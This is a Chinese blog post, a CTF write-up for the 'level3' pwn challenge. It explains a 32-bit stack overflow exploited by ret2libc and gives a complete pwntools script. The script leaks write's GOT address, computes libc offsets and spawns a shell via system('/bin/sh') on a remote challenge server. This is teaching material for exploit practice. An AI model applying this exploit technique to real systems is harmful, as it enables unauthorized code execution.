攻防世界 Pwn level3

最新推荐文章于 2024-05-24 16:43:51 发布
最新推荐文章于 2024-05-24 16:43:51 发布
阅读量283 收藏
点赞数
分类专栏: Pwn 文章标签: pwn 安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrTreebook/article/details/121478372
版权

攻防世界 Pwn level3

1.checksec看一下保护

[*] '/home/ububtu/ctf/level3'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

32位,开启NX保护

2.IDA反汇编分析程序

main函数
在这里插入图片描述
vulnerable_function函数
在这里插入图片描述
程序代码很少,在read()存在栈溢出

3.漏洞利用

无system函数,无binsh字符串,有read和write函数,利用ret2libc。

主要思路有以下几点:

libc中的函数的相对地址是固定的,要想获取到system函数的地址,可以通过write()函数进行offset计算。

在vulnerable_function()中,先调用了write()函数,然后调用read()函数。第一次攻击利用write()函数返回到vulnerable_function()后,再进行read()函数调用,这样就进行二次攻击。

第一次攻击我们利用栈溢出将write()函数在got表中的真实地址泄露出来,然后减去libc中的offset,就可以得到libc的base address。

再利用相对offset计算出system和"/bin/sh"的真实地址

第二次攻击重新进入vulnerable_function()函数,再次通过栈溢出,利用system函数进行getshell。

4.exp附上

#思路:程序流程非常简单,可以突破的点只有read函数。通过覆盖返回地址,执行两次main函数。第一次泄漏write函数的地址,第二次执行system函数。

#导入pwn模块
from pwn import *

#获取远程进程对象
p=remote('111.198.29.45',41496)

#获取本地进程对象
#p = process("./level3/level3")

#获取文件对象
elf=ELF('./level3/level3')

#获取lib库对象
libc = ELF('./level3/libc_32.so.6')

#获取函数
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']

#接收数据
p.recvuntil(":\n")

#char[88] ebp  write函数地址  write函数返回地址(返回到main函数)  write函数参数一(1)  write函数参数二(write_got地址)  write函数参数三(写4字节)
payload=0x88*'a'+p32(0xdeadbeef)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload)

#获取write在got中的地址
write_got_addr=u32(p.recv())
print hex(write_got_addr)

#计算lib库加载基址
libc_base=write_got_addr-libc.sym['write']
print hex(libc_base)

#计算system的地址
system_addr = libc_base+libc.sym['system']
print hex(system_addr)

#计算字符串 /bin/sh 的地址。0x15902b为偏移,通过命令:strings -a -t x libc_32.so.6 | grep "/bin/sh" 获取
bin_sh_addr = libc_base + 0x15902b
print hex(bin_sh_addr)

#char[88] ebp system system函数的返回地址 system函数的参数(bin_sh_addr)
payload2=0x88*'a'+p32(0xdeadbeef)+p32(system_addr)+p32(0x11111111)+p32(bin_sh_addr)

#接收数据
p.recvuntil(":\n")

#发送payload
p.sendline(payload2)

#切换交互模式
p.interactive()

5.题目下载地址

点击下载

==Microsoft==
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
攻防世界pwn新手区题解-level3
weixin_62621015的博客
04-17 896
攻防世界pwn-level3详细题解。
攻防世界新——level3
weixin_62675330的博客
02-10 1421
攻防世界pwn新手区 level3 由题意可得可能跟libc有关。 ps:libc是Linux下的ANSI C的函数库。ANSI C是基本的C语言函数库,包含了C语言最基本的库函数。 引申: glibc 和 libc 都是 Linux 下的 C 函数库。 libc 是 Linux 下的 ANSI C 函数库;glibc 是 Linux 下的 GUN C 函数库。 1.checksec查看保护 文件有两个,一个是elf文件,一个是so文件。 ps:so文件(shared object),so文件是
checksec检查可执行文件时,可以获得一系列与安全相关的属性信息。这些信息有助于开发者和安全专家评估目标程序的安全性,并采取必要的措施来增强安全性。
最新发布
qq_53058639的博客
05-24 369
要查看这些安全特性是否开启,你可以使用checksec工具来扫描目标可执行文件。将替换为你要检查的可执行文件的实际路径。执行这个命令后,checksec会输出关于该可执行文件的一系列安全特性的状态信息。在checksec的输出中,每个安全特性的开启和关闭状态都有特定的表示。请注意,checksec的输出可能会因不同的系统和工具版本而略有不同。因此,在实际使用中,最好查阅checksec的官方文档或相关资源,以获取最准确和最新的信息。
checksec
Trick的博客
11-10 2764
checksec checksec到底是用来干什么的? 它是用来检查可执行文件属性,例如PIE, RELRO, PaX, Canaries, ASLR, Fortify Source等等属性。 我们在ubuntu下使用它时,会显示有5行信息: 1.Arch 从这行信息可以知道程序是32bit还是64bit的 2.RELRO 3.Stack 显示Stack:No canary found则表示可以利用栈溢出 编译时控制是否开启栈保护以及程度: gcc -fno-stack-protector -o test
[BUUCTF]PWN——jarvisoj_level3_x64
mcmuyanga的博客
11-04 1182
jarvisoj_level3_x64 附件 步骤: 例行检查,64位程序,开启了nx保护 试运行一下程序,看看大概的情况 64位ida载入,习惯性的检索字符串,没有发现可以直接利用的system,估计使用ret2libc的方法 从main函数开始看程序 function()函数 输入点buf明显的溢出漏洞,read之前已经调用过一个write函数了,可以利用它来泄露libc版本 利用过程 泄露libc版本 64位程序传参需要用到寄存器rdi,找一下设置rdi寄存器的指令 https://
BUUCTF(pwn)jarvisoj_level3
半岛铁盒的博客
04-02 286
EXP from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25564) main=0x8048484 elf=ELF('./2') write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl..
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
我们可以使用pwn工具来编写exploit,使用from pwn import *来import所需的模块,然后使用context(os='linux', arch='i386', log_level='debug')来设置exploit的环境。我们可以使用io = process("./forgot")来创建一...
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat
04-17
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat,文章pwn - 零基础ROP之Android ARM 32位篇(新修订)https://blog.csdn.net/tabactivity/article/details/137780714 全部资料文件。 0基础pwn
Linux下的内存保护机制
小小鱼的博客
08-12 1497
0. 查看二进制文件开启的保护机制 使用 checsec 命令查看,按照pwntools的话就会装上checksec: 1. RELRO 有关RELRO的技术细节 https://hardenedlinux.github.io/2016/11/25/RelRO.html 有关GOT攻击的技术原理参考 http://blog.csdn.net/smalosnail/article/details/53247502 RELOR开启/关闭 gcc -o test test.c
(Jarvis Oj)(Pwn) level3
Nothing
04-24 1651
(Jarvis Oj)(Pwn) level3 首先用checksec查看一下保护。 依然开启了NX保护。ida反汇编,找到溢出点。 可是呢,这次在程序中并没有找到system函数,和”/bin/sh”字符串,那么这次该如何拿到shell呢,还是利用system函数,但是没有程序中system的plt,我们如何获取system的地址呢,这需要利用到在libc.so文件中各个函数的相对...
Jarvis OJ [XMAN]level3 [XMAN]level3
九层台
07-07 1438
查询保护 liu@liu-F117-F:~/桌面/oj/level3$ checksec level3 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level3/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found ...
PWN-最新checksec的安装和使用
热门推荐
qq_43430261的博客
04-14 1万+
安装 用git安装 $ git clone https://github.com/slimm609/checksec.sh.git 进入文件内 cd checksec.sh 执行下面这条命令,在命令行中建立符号链接就可以在terminal中直接使用了 sudo ln -s checksec /usr/local/bin/checksec #或者sudo ln -sf checksec /us...
透过 checksec 学习 Linux 防溢出攻击保护措施
CHOOOU的博客
11-13 2009
最近用到了 checksec,想整理整理一些 Linux 防溢出的保护措施,因为容易弄混。。 Checksec是一个bash脚本,用于检查可执行文件的属性(如PIE,RELRO,PaX,Canaries,ASLR,Fortify Source),例如: USER@NAME:~# checksec a [*] '/a' Arch: i386-32-little RELRO: ...
安全编译选项检测工具
breakingb的博客
02-18 1757
安全编译选项检测工具,elf文件检测
攻防世界 三 (进阶篇)
sjt670994562的博客
06-09 1053
CRACKME 这一道题对OD的使用进行了一定的训练,虽然相比真真正的使用还是差很多,首先是一个注册问题的exe文件,有窗口,打开OD寻找messagebox。 尝试设置断点 然后尝试打开软件点击注册,发现到了断点,说明断成功了。然后这时候看栈口,会发现之前压进来的数据有失败的提示字面,说明我们没有到判断正误的界面找到最下面的提示字面的地址,跳转,发现函数,设置断点 再次运行,然后发现不行...
[攻防世界 pwn]——level3
Y_peak的博客
02-19 180
题目地址: https://adworld.xctf.org.cn/ 题目: 以前写过这个write up请点击 偷个懒, 师傅们不要介意
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值